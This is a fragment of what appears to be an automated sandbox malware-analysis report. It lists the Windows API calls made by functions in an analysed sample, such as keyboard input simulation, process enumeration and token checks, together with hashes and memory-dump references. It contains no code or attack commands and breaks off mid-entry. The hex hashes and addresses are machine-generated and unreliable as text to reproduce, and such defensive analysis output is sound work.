                                                                                  • Instruction ID: 99eb1ba3932e9e9b3d8b71ae0ee4c6bc6913888f1b3ff61a8feb44c5ecec13cb
                                                                                  • Opcode Fuzzy Hash: 9e63056fd37bd0b50c642aa7075db0f14658aa17b731daeb2a8225c8f3555fcd
                                                                                  • Instruction Fuzzy Hash: 1931CF72A0020AABDF25DFA5EC45EBE7BA6EB40314F194168FD04D7251EB75CE50CBA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00255352
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00255375
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00255382
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002553A8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$InvalidateMessageRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 3340791633-0
                                                                                  • Opcode ID: 8fde0e5877c187b2fa1a864f1dda5ffa1eaf66be2ec9ca4da5c32bad83fcef98
                                                                                  • Instruction ID: b83b45f2439472b1169aec4d4ca3783da2d2b5e1b22ed0f08fba2efbee957269
                                                                                  • Opcode Fuzzy Hash: 8fde0e5877c187b2fa1a864f1dda5ffa1eaf66be2ec9ca4da5c32bad83fcef98
                                                                                  • Instruction Fuzzy Hash: 64310830A75A29FFEB349F14CC25FE83765AB04392F544082FE08561E0C3F09DA89749
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0022ABF1
                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 0022AC0D
                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 0022AC74
                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0022ACC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 28f2568d4980979c7acce965e3b519ad8685d02278bf5fe2525398d4f5aec679
                                                                                  • Instruction ID: 1de9e23eda1d4e0e6fd7138bc327178e6810092425584311ab85927fe412dd8d
                                                                                  • Opcode Fuzzy Hash: 28f2568d4980979c7acce965e3b519ad8685d02278bf5fe2525398d4f5aec679
                                                                                  • Instruction Fuzzy Hash: E6311630A20329BFFF358FA4EC087FA7BA9AB89310F14421BE481525E1D37489A58752
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 0025769A
                                                                                  • GetWindowRect.USER32(?,?), ref: 00257710
                                                                                  • PtInRect.USER32(?,?,00258B89), ref: 00257720
                                                                                  • MessageBeep.USER32(00000000), ref: 0025778C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1352109105-0
                                                                                  • Opcode ID: fcd5355dd02145c027a3dc7397a5adf46034b572d014aca3c9c3523eef90bb16
                                                                                  • Instruction ID: 2f5df17c4552d20b5b958ecebbe9cd7ea4cf1586f61e454274f516099688127a
                                                                                  • Opcode Fuzzy Hash: fcd5355dd02145c027a3dc7397a5adf46034b572d014aca3c9c3523eef90bb16
                                                                                  • Instruction Fuzzy Hash: D341BB34A59216DFDB02CF59F888EA8B7F4FB4C316F1440A9E8149B260D330A969CF94
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 002516EB
                                                                                    • Part of subcall function 00223A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00223A57
                                                                                    • Part of subcall function 00223A3D: GetCurrentThreadId.KERNEL32 ref: 00223A5E
                                                                                    • Part of subcall function 00223A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002225B3), ref: 00223A65
                                                                                  • GetCaretPos.USER32(?), ref: 002516FF
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 0025174C
                                                                                  • GetForegroundWindow.USER32 ref: 00251752
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2759813231-0
                                                                                  • Opcode ID: 7578c45ee0c72dbb0705179189184a6732ab31869c5ffd92899c8fd7e0832032
                                                                                  • Instruction ID: d471789f73d18cd0e9274ccb7cd7ef1479402ce6b5eefedcaf90c82207af7b46
                                                                                  • Opcode Fuzzy Hash: 7578c45ee0c72dbb0705179189184a6732ab31869c5ffd92899c8fd7e0832032
                                                                                  • Instruction Fuzzy Hash: 77315B71D10249AFCB00EFA9C881DAEBBF9EF58304B5080AAE415E7251E731DE45CBA0
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0022D501
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0022D50F
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0022D52F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0022D5DC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 420147892-0
                                                                                  • Opcode ID: 6dfeead2b6adb5b070a2d10ccf21d1391c309c2501e75ee55d28f8270009ff95
                                                                                  • Instruction ID: dab2e5e4adda57c5594e063428ef8ff75be2ec207b97f7c93182a7a93d9376ad
                                                                                  • Opcode Fuzzy Hash: 6dfeead2b6adb5b070a2d10ccf21d1391c309c2501e75ee55d28f8270009ff95
                                                                                  • Instruction Fuzzy Hash: 48319E71008301AFD301EF54E885FAFBBE8EFA9344F50092DF585861A1EBB1D954CBA2
                                                                                  APIs
                                                                                    • Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2
                                                                                  • GetCursorPos.USER32(?), ref: 00259001
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00217711,?,?,?,?,?), ref: 00259016
                                                                                  • GetCursorPos.USER32(?), ref: 0025905E
                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00217711,?,?,?), ref: 00259094
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2864067406-0
                                                                                  • Opcode ID: 6217fa58e9291c0a07cb47511bd8f88ff4f1da007bdfdf2899ac20ab2e67335a
                                                                                  • Instruction ID: 75c1a6d81762f4df017a9ff53b98f9681671a3fe628bafff1ebf4a0ed550ddfb
                                                                                  • Opcode Fuzzy Hash: 6217fa58e9291c0a07cb47511bd8f88ff4f1da007bdfdf2899ac20ab2e67335a
                                                                                  • Instruction Fuzzy Hash: 7621F131210118EFDB258F94DC58EFB3BB9EF89362F100465F905472A1D33199A0EB64
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNEL32(?,0025CB68), ref: 0022D2FB
                                                                                  • GetLastError.KERNEL32 ref: 0022D30A
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0022D319
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0025CB68), ref: 0022D376
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 2267087916-0
                                                                                  • Opcode ID: 02b36c3d781e258df75e1c17789b9ef1d940160bda93decc64296707d71599c6
                                                                                  • Instruction ID: a17ee733c05c583883efd4703cc54ce2c5eb97ed3b6865509c7f1f42b6be8300
                                                                                  • Opcode Fuzzy Hash: 02b36c3d781e258df75e1c17789b9ef1d940160bda93decc64296707d71599c6
                                                                                  • Instruction Fuzzy Hash: 9021F330518312AF8310DF64E8858AE77E4EF66324F204A5DF899C32A1E730C955CF87
                                                                                  APIs
                                                                                    • Part of subcall function 00221014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0022102A
                                                                                    • Part of subcall function 00221014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00221036
                                                                                    • Part of subcall function 00221014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221045
                                                                                    • Part of subcall function 00221014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0022104C
                                                                                    • Part of subcall function 00221014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221062
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002215BE
                                                                                  • _memcmp.LIBVCRUNTIME ref: 002215E1
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00221617
                                                                                  • HeapFree.KERNEL32(00000000), ref: 0022161E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1592001646-0
                                                                                  • Opcode ID: 782b735e3a11b9661d565445775669b3060bdd1ad8d14058d9befa3ed4fb8287
                                                                                  • Instruction ID: e07132bf0ff043e360f770bd473f2d6129ed3cb9823b00ebd6a322f393533bb3
                                                                                  • Opcode Fuzzy Hash: 782b735e3a11b9661d565445775669b3060bdd1ad8d14058d9befa3ed4fb8287
                                                                                  • Instruction Fuzzy Hash: E2218931E10219BFDB00DFA4E948BEEB7B8EF50355F188459E401AB250E730AA24CBA0
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0025280A
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00252824
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00252832
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00252840
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                  • String ID:
                                                                                  • API String ID: 2169480361-0
                                                                                  • Opcode ID: f13efa06d992258f29d2ec0a48618d157190ec4011f44f7f3ec2d13e467c28dc
                                                                                  • Instruction ID: 1a0f23042ac983e9b7f4087b982837e7caaf0fbe4fd5359431844ca1fb48c03f
                                                                                  • Opcode Fuzzy Hash: f13efa06d992258f29d2ec0a48618d157190ec4011f44f7f3ec2d13e467c28dc
                                                                                  • Instruction Fuzzy Hash: 8721F431214211EFD714DB24D849F6AB795EF56325F248158F8268B2D2C771FC4ACBD4
                                                                                  APIs
                                                                                    • Part of subcall function 00228D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0022790A,?,000000FF,?,00228754,00000000,?,0000001C,?,?), ref: 00228D8C
                                                                                    • Part of subcall function 00228D7D: lstrcpyW.KERNEL32(00000000,?,?,0022790A,?,000000FF,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00228DB2
                                                                                    • Part of subcall function 00228D7D: lstrcmpiW.KERNEL32(00000000,?,0022790A,?,000000FF,?,00228754,00000000,?,0000001C,?,?), ref: 00228DE3
                                                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00227923
                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00227949
                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00227984
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                  • String ID: cdecl
                                                                                  • API String ID: 4031866154-3896280584
                                                                                  • Opcode ID: 9f3ffe37012470a44bee9514034dd9c58c983872b3ac704e7e5767d9f15eb3a1
                                                                                  • Instruction ID: 6d9edf45df3368f51cfcfe7aabd7c3ebc6a24d71295e8c72e8fb132ce7b5ec55
                                                                                  • Opcode Fuzzy Hash: 9f3ffe37012470a44bee9514034dd9c58c983872b3ac704e7e5767d9f15eb3a1
                                                                                  • Instruction Fuzzy Hash: B911293A214352BFCB155F78E844D7A77A5FF45350B10802AF906C73A4EB31D961C751
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00257D0B
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00257D2A
                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00257D42
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0023B7AD,00000000), ref: 00257D6B
                                                                                    • Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long
                                                                                  • String ID:
                                                                                  • API String ID: 847901565-0
                                                                                  • Opcode ID: 463ee28fdd63729f85d4b79917d567ce703e6c531bbb9f9b7fd4e7bce75ba6dd
                                                                                  • Instruction ID: 77c8b4a3c88f1e446aa0a1ad88a2df1cd7e53e4fe9f311152163ef8f34cad378
                                                                                  • Opcode Fuzzy Hash: 463ee28fdd63729f85d4b79917d567ce703e6c531bbb9f9b7fd4e7bce75ba6dd
                                                                                  • Instruction Fuzzy Hash: A111DF31265716AFCB109F28EC08ABA3BA5EF45362B214325FC39D72F0E7319964CB44
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 002556BB
                                                                                  • _wcslen.LIBCMT ref: 002556CD
                                                                                  • _wcslen.LIBCMT ref: 002556D8
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00255816
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 455545452-0
                                                                                  • Opcode ID: b6ecdc6569b9f2c8b5e3da0a632d52b77e87fe08d600af17219b3afa8bae1533
                                                                                  • Instruction ID: 2903510f41a5c3c1fb71ba31c2a1df0c78d95b26413659c4eef8f35fb0c9f1a3
                                                                                  • Opcode Fuzzy Hash: b6ecdc6569b9f2c8b5e3da0a632d52b77e87fe08d600af17219b3afa8bae1533
                                                                                  • Instruction Fuzzy Hash: AC11063162062596DF209F61DC95AEE777CFF14366B104026FD05D6081E7B0CAA8CBA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9845b9f9c2ba31ff6eb08e4b2158d12612af5e3d3508345b140871842afd76d9
                                                                                  • Instruction ID: c2ba74790257ab442c9fec077977d303a46df5900232965388d9ab6103d9ecfc
                                                                                  • Opcode Fuzzy Hash: 9845b9f9c2ba31ff6eb08e4b2158d12612af5e3d3508345b140871842afd76d9
                                                                                  • Instruction Fuzzy Hash: B9017CB2209A5EBEF61126B87CC8F77662DEF513B8B350325F621A21D2DB708C005170
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00221A47
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00221A59
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00221A6F
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00221A8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: edfdbbf1e8ab38d4d903e48da09ba23d3502b61afedef0f3c5234740de2f7cc4
                                                                                  • Instruction ID: d6ddec3a3245bb9dba5e15411cf9d7f020d8a58e93a835ce607a78ebbe8c1f25
                                                                                  • Opcode Fuzzy Hash: edfdbbf1e8ab38d4d903e48da09ba23d3502b61afedef0f3c5234740de2f7cc4
                                                                                  • Instruction Fuzzy Hash: 18112A3A901229FFEB109BA4D985FADBB78EB18750F200091E600B7294D6716E60DB94
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0022E1FD
                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 0022E230
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0022E246
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0022E24D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2880819207-0
                                                                                  • Opcode ID: 191f6ca0a96c87ee7487472e522398ff1b51d5dd8c79c6e5e04022def85327d0
                                                                                  • Instruction ID: d2a6ff3d19b6a18336d04c037fa9e1b14d3cb272d7103e4e06769ccdee9cb42b
                                                                                  • Opcode Fuzzy Hash: 191f6ca0a96c87ee7487472e522398ff1b51d5dd8c79c6e5e04022def85327d0
                                                                                  • Instruction Fuzzy Hash: 5911E572904365FFCB019FE8FC09A9E7BACAB45321F104256FD25E3290D2B08D1087A4
                                                                                  APIs
